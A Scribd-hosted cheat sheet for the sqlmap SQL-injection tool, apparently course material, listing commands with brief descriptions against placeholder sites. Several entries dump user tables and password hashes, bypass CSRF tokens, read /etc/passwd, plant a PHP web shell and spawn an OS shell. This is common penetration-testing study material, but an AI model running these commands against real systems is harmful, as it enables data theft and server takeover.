Scribd
Upload
430 views3 pages

Sqlmap Essentials Module Cheat Sheet

Sqlmap_Essentials_Module_Cheat_Sheet

Uploaded by

Kövecs Ildikó
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
430 views3 pages

Sqlmap Essentials Module Cheat Sheet

Sqlmap_Essentials_Module_Cheat_Sheet

Uploaded by

Kövecs Ildikó
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

SQLMAP ESSENTIALS

CHEAT SHEET
Command Description

sqlmap -h View the basic help


menu

sqlmap -hh View the advanced help


menu

sqlmap -u "http://www.example.com/vuln.php?id=1" -- Run SQLMap without


batch asking for user input

sqlmap 'http://www.example.com/' --data SQLMap with POST


'uid=1&name=test' request

sqlmap 'http://www.example.com/' --data POST request specifying


'uid=1*&name=test' an injection point with an
asterisk

sqlmap -r req.txt Passing an HTTP


request file to SQLMap

sqlmap ... -- Specifying a cookie


cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' header

sqlmap -u www.target.com --data='id=1' --method PUT Specifying a PUT


request

sqlmap -u "http://www.target.com/vuln.php?id=1" -- Store traffic to an output


batch -t /tmp/traffic.txt file

sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 Specify verbosity level


--batch
Command Description

sqlmap -u "www.example.com/?q=test" --prefix="%'))" - Specifying a prefix or


-suffix="-- -" suffix

sqlmap -u www.example.com/?id=1 -v 3 --level=5 Specifying the level and


risk

sqlmap -u "http://www.example.com/?id=1" --banner -- Basic DB enumeration


current-user --current-db --is-dba

sqlmap -u "http://www.example.com/?id=1" --tables -D Table enumeration


testdb

sqlmap -u "http://www.example.com/?id=1" --dump -T Table/row enumeration


users -D testdb -C name,surname

sqlmap -u "http://www.example.com/?id=1" --dump -T Conditional enumeration


users -D testdb --where="name LIKE 'f%'"

sqlmap -u "http://www.example.com/?id=1" --schema Database schema


enumeration

sqlmap -u "http://www.example.com/?id=1" --search -T Searching for data


user

sqlmap -u "http://www.example.com/?id=1" --passwords Password enumeration


--batch and cracking

sqlmap -u "http://www.example.com/" -- Anti-CSRF token bypass


data="id=1&csrf-
token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-
token="csrf-token"

sqlmap --list-tampers List all tamper scripts

sqlmap -u "http://www.example.com/case1.php?id=1" -- Check for DBA privileges


is-dba

sqlmap -u "http://www.example.com/?id=1" --file-read Reading a local file


"/etc/passwd"

sqlmap -u "http://www.example.com/?id=1" --file-write Writing a file


"shell.php" --file-dest "/var/www/html/shell.php"

sqlmap -u "http://www.example.com/?id=1" --os-shell Spawning an OS shell

You might also like